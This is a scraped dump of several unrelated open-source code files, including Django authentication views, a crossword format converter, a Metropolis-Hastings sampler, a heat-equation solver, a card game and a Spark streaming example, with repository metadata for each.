username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n else:\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n\n\nclass SignUpController(View):\n def get(self, request, *args, **kwargs):\n signup = Signup()\n return render(\n request,\n template_name=\"signup.html\",\n context=\n {\n 'signup': signup\n }\n )\n\n def post(self, request, *args, **kwargs):\n form = Signup(request.POST)\n if form.is_valid():\n user = User.objects.create_user(**form.cleaned_data)\n if user is not None:\n login(request, user)\n return redirect(\"http://127.0.0.1:8000/onlineapp/collegeret1/\")\n else:\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n\n\ndef logout_user(request):\n logout(request)\n return redirect(\"http://127.0.0.1:8000/onlineapp/login/\")\n","repo_name":"ramyasree0299/summer2019_GNITS_ramyasree","sub_path":"Apps Course/classproject/onlineapp/views/onlineappviews.py","file_name":"onlineappviews.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3965230057","text":"#!/usr/bin/env python3\n\nimport sys\nimport string\nimport urllib.parse\n\n# pip install crossword puzpy\n\nimport puz\nimport crossword\n\n\nREBUS_SEP = \" \"\nUNKNOWN_CHAR = '.'\nBLOCK_CHAR = '#'\nOPEN_CHAR = '_'\nEOL = '\\n'\nSECTION_SEP = EOL + EOL\nHEADER_ORDER = ['title', 'author', 'editor', 'copyright', 'number', 'date',\n 'relation', 'special', 'rebus', 'cluegroup', 'description', 'notes']\n\nNON_ANSWER_CHARS = [BLOCK_CHAR, OPEN_CHAR] # UNKNOWN_CHAR is a wildcard answer 
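# Editor's note: in AddStudentView.get above, MockTest1.objects.get(student=...)
# raises MockTest1.DoesNotExist when no marks row exists, so the
# "if m is not None" guard right after it can never fire. The usual Django idiom
# returns None instead of raising; a minimal sketch of that lookup:
m = MockTest1.objects.filter(student=kwargs.get('db_folder')).first()
if m is not None:
    form_marks = AddMarks(instance=m)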
character\n\n\ndef decode(s):\n s = s.replace('\\x92', \"'\")\n s = s.replace('\\xc2\\x92', \"'\")\n s = s.replace('\\xc3\\x82',\"\")\n s = s.replace('\\xc3\\xa8',\"è\") # +A5. Crème de la crème ~ ELITE\n s = s.replace('\\xe0','à') # -A49. Do the seemingly impossible, à la Jesus ~ WALKONWATER\n s = s.replace('\\xc2', \" \") # Change rest of 0xC2 to 0x20\n s = s.replace('\\xa0',\" \")\n s = s.replace('\\x93', '\"')\n s = s.replace('\\x94', '\"')\n s = s.replace('\\x97', \"—\")\n s = s.replace('\\x85', '...')\n s = s.replace('\\x86', '†')\n s = s.replace('\\xd3','\"')\n s = s.replace('\\xd4','\"')\n s = urllib.parse.unquote(s)\n return s\n\n\nclass xdfile:\n def __init__(self):\n self.headers = {} # [key] -> value or list of values\n self.grid = [] # list of string rows\n self.clues = [] # list of ((\"A\", 21), \"{*Bold*}, {/italic/}, {_underscore_}, or {-overstrike-}\", \"MARKUP\")\n self.notes = \"\"\n\n def cell(self, r, c):\n if r < 0 or c < 0 or r >= len(self.grid) or c >= len(self.grid[0]):\n return BLOCK_CHAR\n return self.grid[r][c]\n\n def rebus(self):\n \"\"\"returns rebus dict of only special (non A-Z) characters\"\"\"\n rebusstr = self.get_header(\"Rebus\")\n r = {}\n if rebusstr:\n for p in rebusstr.split(REBUS_SEP):\n cellchar, _, replstr = p.partition(\"=\")\n assert len(cellchar) == 1, (rebusstr, cellchar)\n replstr = replstr.strip()\n r[cellchar] = replstr\n\n return r\n\n # generates: \"A\" or \"D\", clue_num, answer, r, c\n def iteranswers_full(self):\n # construct rebus dict with all grid possibilities so that answers are complete\n rebus = {}\n for c in string.ascii_letters:\n assert c not in rebus, c\n rebus[c] = c.upper()\n rebus.update(self.rebus())\n\n # traverse grid and yield (dir, pos, answer)\n clue_num = 1\n\n for r, row in enumerate(self.grid):\n for c, cell in enumerate(row):\n # compute number shown in box\n new_clue = False\n if self.cell(r, c - 1) in NON_ANSWER_CHARS: # across clue start\n ncells = 0\n answer = \"\"\n while self.cell(r, c + ncells) not in NON_ANSWER_CHARS:\n cellval = self.cell(r, c + ncells)\n answer += rebus.get(cellval, cellval)\n ncells += 1\n\n if ncells > 1:\n new_clue = True\n yield \"A\", clue_num, answer, r, c\n\n if self.cell(r - 1, c) in NON_ANSWER_CHARS: # down clue start\n ncells = 0\n answer = \"\"\n while self.cell(r + ncells, c) not in NON_ANSWER_CHARS:\n cellval = self.cell(r + ncells, c)\n answer += rebus.get(cellval, cellval)\n ncells += 1\n\n if ncells > 1:\n new_clue = True\n yield \"D\", clue_num, answer, r, c\n\n if new_clue:\n clue_num += 1\n\n def width(self):\n return self.grid and len(self.grid[0]) or 0\n\n def height(self):\n return len(self.grid)\n\n # returns (w, h)\n def size(self):\n return (self.width(), self.height())\n\n def iteranswers(self):\n for direction, clue_num, answer, r, c in self.iteranswers_full():\n yield direction, clue_num, answer\n\n def set_header(self, fieldname, newvalue=None):\n# if fieldname in self.headers:\n# if newvalue != self.headers.get(fieldname, None):\n# log(\"%s[%s] '%s' -> '%s'\" % (self.filename, fieldname, self.headers[fieldname], newvalue))\n\n if newvalue:\n newvalue = str(newvalue).strip()\n newvalue = \" \".join(newvalue.splitlines())\n newvalue = newvalue.replace(\"\\t\", \" \")\n\n self.headers[fieldname] = newvalue\n else:\n if fieldname in self.headers:\n del self.headers[fieldname]\n\n def get_header(self, fieldname):\n v = self.headers.get(fieldname)\n assert v is None or isinstance(v, str), v\n return (v or \"\").strip()\n\n def iterheaders(self):\n def 
header_sort_key(item):\n if item[0].lower() not in HEADER_ORDER:\n return 1000\n\n return HEADER_ORDER.index(item[0].lower())\n\n for k, v in sorted(list(self.headers.items()), key=header_sort_key):\n yield k, v\n\n def to_unicode(self, emit_clues=True):\n # headers (section 1)\n\n r = \"\"\n\n if self.headers:\n for k, v in self.iterheaders():\n assert isinstance(v, str), v\n\n r += \"%s: %s\" % (k, v)\n r += EOL\n else:\n r += \"Title: %s\" % parse_pathname(self.filename).base\n r += EOL\n\n r += SECTION_SEP\n\n # grid (section 2)\n r += EOL.join(self.grid)\n r += EOL + EOL + EOL\n\n # clues (section 3)\n if emit_clues:\n prevdir = None\n for pos, clue, answer in self.clues:\n if not answer:\n r += EOL\n continue\n\n cluedir, cluenum = pos\n if prevdir and prevdir != cluedir: # Blank line between cluedirs\n r += EOL\n prevdir = cluedir\n\n r += \"%s%s. %s ~ %s\" % (cluedir, cluenum, (clue or \"[XXX]\").strip(), answer)\n r += EOL\n\n if self.notes:\n r += EOL + EOL\n r += self.notes\n\n r += EOL\n\n # some Postscript CE encodings can be caught here\n r = r.replace('\\x91', \"'\")\n r = r.replace('\\x92', \"'\")\n r = r.replace('\\x93', '\"')\n r = r.replace('\\x94', '\"')\n r = r.replace('\\x96', '___')\n r = r.replace('\\x85', '...')\n\n # these are always supposed to be double-quotes\n r = r.replace(\"''\", '\"')\n\n return r\n\n\ndef parse_puz(contents, filename):\n rebus_shorthands = list(\"zyxwvutsrqponmlkjihgfedcba⚷⚳♇♆⛢♄♃♂♁♀☿♹♸♷♶♵♴♳⅘⅗⅖⅕♚♛♜♝♞♟⚅⚄⚃⚂⚁⚀♣♦♥♠+&%$@?*0987654321\")\n\n try:\n puzobj = puz.load(contents)\n puzzle = crossword.from_puz(puzobj)\n except puz.PuzzleFormatError as e:\n emsg = e.message\n if \"\" in contents.decode('utf-8').lower():\n emsg += \" (looks like html)\"\n raise Exception(emsg)\n\n grid_dict = dict(list(zip(string.ascii_uppercase, string.ascii_uppercase)))\n\n xd = xdfile()\n\n xd.set_header(\"Author\", puzobj.author)\n xd.set_header(\"Copyright\", puzobj.copyright)\n xd.set_header(\"Notes\", puzobj.notes)\n xd.set_header(\"Postscript\", \"\".join(x for x in puzobj.postscript if ord(x) >= ord(' ')))\n xd.set_header(\"Preamble\", puzobj.preamble)\n\n xd.set_header(\"Title\", puzobj.title)\n\n used_rebuses = {} # [puz_rebus_gridvalue_as_string] -> our_rebus_gridvalue\n rebus = {} # [our_rebus_gridvalue] -> full_cell\n r = puzobj.rebus()\n if r.has_rebus():\n grbs = puzobj.extensions[b\"GRBS\"]\n if sum(x for x in grbs if x != 0) > 0: # check for an actual rebus\n for pair in puzobj.extensions[b\"RTBL\"].decode(\"cp1252\").split(\";\"):\n pair = pair.strip()\n if not pair:\n continue\n key, value = pair.split(\":\")\n rebuskey = rebus_shorthands.pop()\n used_rebuses[key] = rebuskey\n rebus[rebuskey] = decode(value)\n\n rebustr = REBUS_SEP.join([(\"%s=%s\" % (k, v)) for k, v in sorted(rebus.items())])\n xd.set_header(\"Rebus\", rebustr)\n\n # check for circles and record them if they exist\n circles = []\n if b\"GEXT\" in puzobj.extensions: \n for i, c in enumerate(puzobj.extensions[b\"GEXT\"]):\n if c == 0x80: circles.append(i)\n if circles: xd.set_header(\"Special\", \"circle\")\n\n for r, row in enumerate(puzzle):\n rowstr = \"\"\n for c, cell in enumerate(row):\n if puzzle.block is None and cell.solution == '.':\n rowstr += BLOCK_CHAR\n elif cell.solution == puzzle.block:\n rowstr += BLOCK_CHAR\n elif cell.solution == ':':\n rowstr += OPEN_CHAR\n elif cell == puzzle.empty:\n rowstr += UNKNOWN_CHAR\n else:\n n = r * puzobj.width + c\n reb = puzobj.rebus()\n if reb.has_rebus() and n in reb.get_rebus_squares():\n ch = str(reb.table[n] - 1)\n rowstr += 
used_rebuses[ch]\n cell.solution = rebus[used_rebuses[ch]]\n else:\n ch = cell.solution\n if ch not in grid_dict:\n if ch in rebus_shorthands:\n cellch = ch\n rebus_shorthands.remove(ch)\n warn(\"%s: unknown grid character '%s', assuming rebus of itself\" % (filename, ch))\n else:\n cellch = rebus_shorthands.pop()\n warn(\"%s: unknown grid character '%s', assuming rebus (as '%s')\" % (filename, ch, cellch))\n\n xd.set_header(\"Rebus\", xd.get_header(\"Rebus\") + \" %s=%s\" % (cellch, ch))\n\n grid_dict[ch] = cellch\n rowstr += grid_dict[ch].lower() if n in circles else grid_dict[ch]\n # ^ assumes a cell is never rebus and circle.\n\n xd.grid.append(rowstr)\n\n assert xd.size() == (puzzle.width, puzzle.height), \"non-matching grid sizes\"\n\n # clues\n answers = {}\n\n for posdir, posnum, answer in xd.iteranswers():\n answers[posdir[0] + str(posnum)] = answer\n\n try:\n for number, clue in puzzle.clues.across():\n cluenum = \"A\" + str(number)\n if cluenum not in answers:\n raise Exception(\"Clue number doesn't match grid: %s\" % cluenum)\n xd.clues.append(((\"A\", number), decode(clue), answers.get(cluenum, \"\")))\n\n for number, clue in puzzle.clues.down():\n cluenum = \"D\" + str(number)\n if cluenum not in answers:\n raise Exception(\"Clue doesn't match grid: %s\" % cluenum)\n xd.clues.append(((\"D\", number), decode(clue), answers.get(cluenum, \"\")))\n except KeyError as e:\n raise Exception(\"Clue doesn't match grid: %s\" % e)\n\n return xd\n\n\ndef main(fn):\n xd = parse_puz(open(fn, mode='rb').read(), fn)\n print(xd.to_unicode())\n\n\nfor fn in sys.argv[1:]:\n main(fn)\n","repo_name":"century-arcade/xd","sub_path":"puz2xd-standalone.py","file_name":"puz2xd-standalone.py","file_ext":"py","file_size_in_byte":11263,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"31"} +{"seq_id":"8487171171","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport threading\nimport time\n\n\nclass SendMonitorThread(threading.Thread):\n \"\"\" パケット送信モニタースレッド \"\"\"\n\n def __init__(self, sendObj, params):\n super(SendMonitorThread, self).__init__()\n self.sendObj = sendObj\n self.pps = params.pps\n self.stop_flg = False\n self.prev = 0\n self.current = 0\n\n def run(self):\n while True:\n self._update()\n if self.stop_flg:\n break\n # 1秒タイマー\n # ここはtime.perf_counter()つかうと送信精度落ちる\n time.sleep(1)\n self._clear()\n\n def stop(self):\n self.stop_flg = True\n\n def _clear(self):\n self.pps.set(0)\n self.sendObj.count = 0\n\n def _update(self):\n # 頻繁にカウンタリセットすると送信性能落ちるため\n # 差分を拾っていく\n self.current = self.sendObj.count\n self.pps.set(self.current - self.prev)\n self.prev = self.current\n\n # オーバーフロー対策\n # int最大値の半分以上でリセット\n if self.current > sys.maxsize / 2:\n self._reset()\n\n def _reset(self):\n self.current = 0\n self.prev = 0\n self.sendObj.count = 0\n","repo_name":"kinformation/hachi","sub_path":"model/SendMonitorThread.py","file_name":"SendMonitorThread.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19579679462","text":"import inspect\nfrom types import FunctionType\nfrom typing import Union, get_type_hints\n\n\ndef _merge(functions: list, iter):\n \"\"\"Get a set of attributes describing several functions.\n\n Args:\n functions (list): list of functions (FunctionType)\n\n Raises:\n TypeError: If two functions have the same parameter name with different types or defaults.\n \"\"\"\n output = {}\n for f in functions:\n assert isinstance(f, 
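# Editor's note: the SendMonitorThread record above (its Japanese comments
# describe a packet-send monitor that refreshes a pps counter once per second
# and resets it before integer overflow) polls a boolean stop flag around
# time.sleep(1), so stop() can take up to a second to be noticed.
# threading.Event keeps the same one-second cadence while waking immediately
# when stop() is called; an illustrative sketch, not the record's code:
import threading

class MonitorThread(threading.Thread):
    def __init__(self):
        super().__init__()
        self._stop_event = threading.Event()

    def run(self):
        # wait() returns False on timeout (keep looping) and True once set
        while not self._stop_event.wait(timeout=1.0):
            pass  # update the counters here, as _update() does in the record

    def stop(self):
        self._stop_event.set()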
FunctionType)\n i = iter(f)\n for k, v in i.items():\n if k in output:\n try:\n assert v == output[k]\n except AssertionError as e:\n raise TypeError(\n f\"Incompatible functions {functions}: {k} represented as both {v} and {output[k]}\"\n ) from e\n else:\n output[k] = v\n return output\n\n\ndef _merge_signatures(functions: list):\n \"\"\"Create a combined list of function parameters.\"\"\"\n return _merge(functions, lambda f: inspect.signature(f).parameters)\n\n\ndef _merge_type_hints(functions: list):\n \"\"\"Create a combined list of function parameter type hints.\"\"\"\n return _merge(functions, lambda f: get_type_hints(f))\n\n\ndef _get_defaults(signature):\n \"\"\"Create a dict of function parameters with defaults.\"\"\"\n return {\n k: v.default\n for k, v in signature.items()\n if v.default is not inspect.Parameter.empty\n }\n\n\ndef validate(functions: list, params: dict) -> dict:\n \"\"\"Validate and build kwargs for a set of functions based on their signatures.\n\n Args:\n functions (list): functions\n params (dict): kwargs provided in the event's message\n\n Returns:\n dict: validated kwargs required by the provided set of functions\n \"\"\"\n signature = _merge_signatures(functions)\n defaults = _get_defaults(signature)\n hints = _merge_type_hints(functions)\n\n validated = {}\n for k, v in signature.items():\n if k in params:\n p = params[k]\n if k in hints:\n t = hints[k]\n try:\n if hasattr(t, \"__origin__\") and t.__origin__ is Union:\n # https://stackoverflow.com/a/49471187\n assert any([isinstance(p, typ) for typ in t.__args__])\n else:\n assert isinstance(p, t)\n except AssertionError as e:\n raise TypeError(f\"Type of {k} should be {t} not {type(p)}.\") from e\n validated[k] = p\n else:\n validated[k] = p\n elif k not in (\"kwargs\", \"args\"):\n try:\n assert k in defaults\n except AssertionError as e:\n raise TypeError(f\"{functions} missing required argument: '{k}'\") from e\n\n return validated\n","repo_name":"mintel/lpipe","sub_path":"lpipe/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"6923866911","text":"from Chapter8.MilestoneProject.DeckOfCards import DeckOfCards\nfrom Chapter8.MilestoneProject.Player import Player\n\nmy_dec = DeckOfCards()\nplayer_one = Player('essa')\nplayer_two = Player('nada')\n\n\ndef deal_cards():\n my_dec.create_deck_of_cards()\n for _ in range(int(len(my_dec) / 2)):\n player_one.add_cards(my_dec.pick_card())\n player_two.add_cards(my_dec.pick_card())\n\n\ndef start_war(player_one_table, player_two_table):\n winner = ''\n war_is_on = True\n while war_is_on:\n if len(player_one.deck_of_cards) == 0:\n winner = player_two\n return winner, player_one_table + player_two_table\n elif len(player_two.deck_of_cards) == 0:\n winner = player_one\n return winner, player_one_table + player_two_table\n\n player_one_table.append(player_one.remove_cards())\n player_two_table.append(player_two.remove_cards())\n\n print(f'Player 1 Picked {str(player_one_table[-1])}')\n print(f'Player 2 Picked {str(player_two_table[-1])}')\n\n if player_one_table[-1].value > player_two_table[-1].value:\n winner = player_one\n war_is_on = False\n elif player_one_table[-1].value < player_two_table[-1].value:\n winner = player_two\n war_is_on = False\n print('------- War ended -------')\n return winner, player_one_table + player_two_table\n\n\ndef evaluate():\n player_one_table = [player_one.remove_cards()]\n player_two_table = 
[player_two.remove_cards()]\n\n print(f'Player 1 Hand {str(player_one_table[0])}')\n print(f'Player 2 Hand {str(player_two_table[0])}')\n\n if player_one_table[0].value == player_two_table[0].value:\n print('------- War Started -------')\n winner, cards = start_war(player_one_table, player_two_table)\n elif player_one_table[0].value > player_two_table[0].value:\n winner = player_one\n cards = player_one_table + player_two_table\n else:\n winner = player_two\n cards = player_one_table + player_two_table\n\n if winner == player_one:\n player_one.add_cards(cards)\n print(f'Player 1 Won the following cards {[str(x) for x in cards]}')\n\n else:\n player_two.add_cards(cards)\n print(f'Player 2 Won the following cards {[str(x) for x in cards]}')\n\n\ndef game_start():\n print('Dealing Cards')\n deal_cards()\n print('Starting Game')\n game_on = True\n\n while game_on:\n evaluate()\n if len(player_one.deck_of_cards) == 0:\n print('Player Two Won!!!')\n game_on = False\n elif len(player_two.deck_of_cards) == 0:\n print('Player One Won!!!')\n game_on = False\n\n if not game_on:\n user_choice = ''\n while user_choice != 'y' and user_choice != 'n':\n user_choice = input(\"Do you want to play again ? y/n\")\n\n if user_choice == 'y':\n player_one.wipe_cards()\n player_two.wipe_cards()\n deal_cards()\n game_on = True\n else:\n break\n\n\ngame_start()\n","repo_name":"EssaMaathMohammed/TestingPython","sub_path":"Chapter8/MilestoneProject/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36869372098","text":"\"\"\"\n090915 S.Rodney\nCrude Metropolis-Hastings\n\"\"\"\n\ndef mcsample( p, x, Ndraws, x0=None, sigma=None, Nburnin=100, \n debug=False) :\n \"\"\" p and x are arrays holding values that sample a\n probability distribution: p(x). \n We construct a Markov Chain with Ndraws steps using the \n Metropolis-Hastings algorithm with a gaussian proposal distribution \n of stddev sigma. Default is sigma = (xmax-xmin)/10. 
\n \"\"\"\n from numpy import random\n from scipy import interpolate\n if debug: import pdb; pdb.set_trace()\n \n xmax = x[-1]\n xmin = x[0]\n if not sigma : sigma = (xmax-xmin)/10\n\n # define a linear interpolation probability function \n plint = interpolate.interp1d( x, p, copy=False, \n bounds_error=False, fill_value=0 )\n # if user doesn't provide a starting point, \n # then draw an initial random position\n if not x0 : x0 = random.uniform( xmin, xmax )\n p0 = plint( x0 ) \n xsamples = []\n # for i in xrange(Ndraws) : \n istep = 0\n while len(xsamples) < Ndraws :\n # draw a new position from a Gaussian proposal dist'n\n x1 = random.normal( x0, sigma ) \n p1 = plint( x1 )\n # compare new against old position\n if p1>=p0 : \n # new position has higher probability, so\n # accept it unconditionally\n if istep>Nburnin : xsamples.append( x1 ) \n p0=p1\n x0=x1\n else : \n # new position has lower probability, so \n # pick new or old based on relative probs.\n y = random.uniform( )\n if y<p1/p0 : \n if istep>Nburnin : xsamples.append( x1 )\n p0=p1\n x0=x1\n else : \n if istep>Nburnin : xsamples.append( x0 )\n istep +=1\n return( xsamples )\n\n\ndef sntest(sn, N=1000, Nbin=100, sigma=None, debug=False):\n from numpy import arange\n pz = sn.PDF.data1 * sn.PDF.XSTEP \n pz = pz / pz.sum()\n zpk = sn.PDF.zpk\n nz = sn.PDF.NAXIS2\n dz = sn.PDF.XSTEP\n z0 = sn.PDF.XSTART\n z1 = sn.PDF.XSTART+nz*dz\n z = arange( z0, z1, dz )[:nz]\n \n if len(z) != len(pz): import pdb; pdb.set_trace()\n\n zsamples = mcsample( pz, z, N, sigma=sigma, debug=debug )\n\n from pylab import clf,plot,bar\n from numpy import histogram\n \n binct, binedge = histogram(zsamples, Nbin, new=True, normed=False )\n binsize = binedge[1]-binedge[0]\n binct = binct.astype(float) /binct.sum()/binsize\n clf()\n bar(binedge[:-1], binct, binsize,color='slateblue' )\n plot( z, pz/pz.sum()/dz, ls='-', color='maroon', marker=' ',\n lw=3)\n #return( binct, binedge, z, pz )\n","repo_name":"srodney/srpytools","sub_path":"metro.py","file_name":"metro.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69804533210","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nDENSITY = 2.7889*1e3 # Kg/m^3\nTHERMAL_COND = 0.2473*1e3 # W/m-K\nSPECIFIC_HEAT = 0.7639*1e3 # J/Kg-K\nLENGTH = 0.12 # m\nTIME = 2000 # secs\n\nN1 = 1000\nN2 = 2000\nN3 = 3000\nN4 = 5000\nN5 = 10000\nN6 = 20000\n\nh = 3000 # W/m-K\nNUM_PTS_X = 100\nDELTA_X = LENGTH/NUM_PTS_X\nLAMBDA = THERMAL_COND/(DENSITY*SPECIFIC_HEAT)\nDELTA_T = DELTA_X ** 2 / (2* LAMBDA)\nSIGMA = (LAMBDA * DELTA_T) / DELTA_X ** 2\nNUM_PTS_T = int(TIME/ DELTA_T)\n# print(NUM_PTS_T)\nBETA = (DELTA_X*h)/THERMAL_COND\n\nT_amb = 298 # K\n\nassert (N1 + N2 + N3 + N4 + N5 + N6) <= NUM_PTS_T, \"Change NUM_PTS_T\"\n\ndef initialTemp (x = 0):\n\n f= 673\n return f\n\ndef heatSource (x = 0 , t = 0):\n\n q = 0\n\n return q\n\ndef initialCondition(spaceLocation):\n\n up = np.full(len(spaceLocation), initialTemp())\n\n return up\n\n\ndef meshing():\n\n spaceMeshLocation = np.zeros(NUM_PTS_X+1)\n timeMeshLocations = np.zeros(NUM_PTS_T+1)\n\n for i in range(0,NUM_PTS_X+1):\n spaceMeshLocation[i] = i*DELTA_X\n\n for i in range(0,NUM_PTS_T+1):\n timeMeshLocations[i] = i*DELTA_T\n\n return spaceMeshLocation, timeMeshLocations\n\n\ndef plottemp(u,spaceLocation, time):\n\n plt.plot(spaceLocation,u[0,:], 'r')\n plt.plot(spaceLocation,u[1,:], 'g')\n plt.plot(spaceLocation, u[2, :], 'b')\n plt.plot(spaceLocation, u[3, :], '--r')\n 
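# --- Editor's aside (illustration only, not part of the dataset records around it) ---
# The Transient_FTCS record here pins DELTA_T = DELTA_X**2 / (2*LAMBDA), so the explicit
# FTCS stability number SIGMA = LAMBDA*DELTA_T / DELTA_X**2 is exactly 1/2, the largest
# value for which the scheme stays stable. A minimal standalone check of that bound,
# reusing the constants declared in the record (SI units):
LENGTH, NUM_PTS_X = 0.12, 100
DENSITY, THERMAL_COND, SPECIFIC_HEAT = 2.7889e3, 0.2473e3, 0.7639e3
dx = LENGTH / NUM_PTS_X
lam = THERMAL_COND / (DENSITY * SPECIFIC_HEAT)  # thermal diffusivity, m^2/s
dt = dx ** 2 / (2 * lam)
sigma = lam * dt / dx ** 2
assert sigma <= 0.5 + 1e-12, "explicit FTCS would be unstable for this dt"
print("dx=%.4f m, dt=%.6f s, sigma=%.2f" % (dx, dt, sigma))
# --- end aside ---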
plt.plot(spaceLocation, u[4, :], '--g')\n plt.plot(spaceLocation, u[5, :], '--b')\n\n plt.xlabel('Length (m)')\n plt.ylabel('Temperature (K)')\n plt.title('Length ($x$) vs. Temperature ($u$)')\n label0 = 't ={0:0.2f} secs'.format(time[0])\n label1 = 't ={0:0.2f} secs'.format(time[1])\n label2 = 't ={0:0.2f} secs'.format(time[2])\n label3 = 't ={0:0.2f} secs'.format(time[3])\n label4 = 't ={0:0.2f} secs'.format(time[4])\n label5 = 't ={0:0.2f} secs'.format(time[5])\n\n plt.gca().legend((label0,label1,label2, label3, label4, label5), loc = 'upper right')\n plt.ylim(298,678)\n plt.xlim(0,0.12)\n plt.show()\n\n\ndef solver_FTCS():\n\n\n spaceLocation, timeLocation = meshing()\n up = initialCondition(spaceLocation)\n uc = np.zeros(len(spaceLocation))\n u = np.zeros((6, len(spaceLocation)))\n time = []\n u_ss = np.full(len(spaceLocation), T_amb)\n\n for t in range(1, len(timeLocation)):\n\n for i in range(1, len(spaceLocation)-1):\n\n uc[i] = up[i]+SIGMA*(up[i+1]-2*up[i]+up[i-1])+((heatSource()*DELTA_T)/(DENSITY*THERMAL_COND))\n\n uc[0] = (uc[1] + BETA*T_amb)/(1+BETA)\n uc[len(spaceLocation)-1] = (uc[len(spaceLocation)-2]+BETA*T_amb)/(1+BETA)\n up = uc.copy() # copy, not alias: the FTCS sweep must read the previous time level, not freshly updated neighbours\n\n if timeLocation[t] == N1*DELTA_T:\n u[0,:] = up\n time.append(N1*DELTA_T)\n\n elif timeLocation[t] == N2*DELTA_T:\n u[1,:] = up\n time.append(N2*DELTA_T)\n\n elif timeLocation[t] == N3*DELTA_T:\n u[2,:] = up\n time.append(N3 * DELTA_T)\n\n elif timeLocation[t] == N4 * DELTA_T:\n u[3, :] = up\n time.append(N4 * DELTA_T)\n\n elif timeLocation[t] == N5 * DELTA_T:\n u[4, :] = up\n time.append(N5 * DELTA_T)\n\n elif timeLocation[t] == N6 * DELTA_T:\n u[5, :] = up\n time.append(N6 * DELTA_T)\n\n u_check = np.subtract(up, u_ss)\n\n if (u_check < 0.001).all():\n print(\"Steady state reached at {0:0.2f} secs\".format(timeLocation[t]))\n break\n\n plottemp(u, spaceLocation, time)\n\n\n\n\nsolver_FTCS()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shadzzz90/Solving-Partial-Differential-Equations-using-Python","sub_path":"Transient_FTCS.py","file_name":"Transient_FTCS.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40671740897","text":"from odoo.tests.common import SavepointCase\n\n\nclass TestHrExpenseSequence(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.expense_model = cls.env[\"hr.expense\"]\n cls.expense_sheet_model = cls.env[\"hr.expense.sheet\"]\n cls.product = cls.env.ref(\"product.product_product_4\")\n\n employee_home = cls.env[\"res.partner\"].create({\"name\": \"Employee Home Address\"})\n cls.employee = cls.env[\"hr.employee\"].create(\n {\"name\": \"Employee\", \"address_home_id\": employee_home.id}\n )\n cls.expense = cls.create_expense(cls, \"Expense\")\n\n def create_expense(self, name):\n \"\"\"Returns an open expense\"\"\"\n expense = self.expense_model.create(\n {\n \"name\": name,\n \"employee_id\": self.employee.id,\n \"product_id\": self.product.id,\n \"unit_amount\": self.product.standard_price,\n \"quantity\": 1,\n }\n )\n expense.action_submit_expenses()\n return expense\n\n def test_create_sequence(self):\n # Test number != '/'\n self.sheet = self.expense_sheet_model.create(\n {\"name\": \"Expense Report\", \"employee_id\": self.employee.id}\n )\n self.assertNotEqual(self.sheet.number, \"/\", \"Number create\")\n # Test number 1 != number 2\n expense_number_1 = self.sheet.number\n expense2 = self.sheet.copy()\n expense_number_2 = expense2.number\n self.assertNotEqual(expense_number_1, 
expense_number_2, \"Numbers are different\")\n","repo_name":"OCA/hr-expense","sub_path":"hr_expense_sequence/tests/test_hr_expense_sequence.py","file_name":"test_hr_expense_sequence.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"31"} +{"seq_id":"12377777353","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import length\n\n# Local SparkSession\nspark = (SparkSession\n .builder\n .master(\"local[*]\")\n .appName(\"Socket-DataFrame_Nothing-StdOut\")\n .getOrCreate())\n\n# 1. Input data: DataFrame representing the stream of input lines from socket\ndf = (spark\n .readStream\n .format(\"socket\")\n .option(\"host\", \"localhost\")\n .option(\"port\", 9999)\n .load())\n\n# 2. Data processing: nothing\n\n# 3. Output data: show result in the console\nquery = (df\n .writeStream\n .outputMode(\"append\")\n .format(\"console\")\n .start())\n\nquery.awaitTermination()\n","repo_name":"bonigarcia/spark-examples","sub_path":"streaming/socket-dataframe_nothing-stdout.py","file_name":"socket-dataframe_nothing-stdout.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7021602852","text":"def getFunktion(name):\r\n file = open(name+\".txt\", \"r\")\r\n rv = []\r\n for line in file.readlines():\r\n ll = line.split(\",\")\r\n rv.append((float(ll[0]), float(ll[1])))\r\n return rv\r\n\r\ndef getFktValue(locp, x):\r\n getmn = False\r\n for i in range(len(locp)-1):\r\n if (locp[i][0] <= x) and (locp[i+1][0] > 0):\r\n m = (locp[i+1][1]-locp[i][1])/(locp[i+1][0]-locp[i][0])\r\n n = locp[i+1][1]-m*locp[i+1][0]\r\n getmn = True\r\n if not getmn:\r\n return -1\r\n return m*x+n\r\n\r\ndef getError(locp, point, maxy):\r\n fy = getFktValue(locp, point[0])\r\n if fy > maxy/2:\r\n maxe = fy\r\n else:\r\n maxe = maxy - fy\r\n return(round(abs(fy-point[1]),8), round(maxe, 8))","repo_name":"mgdoep/_StEX","sub_path":"lndw/drawfkt.py","file_name":"drawfkt.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73371055767","text":"import micropython # For emergency exception buffer\nfrom pyb import I2C # For i2c bus access\nfrom APDS_9960 import 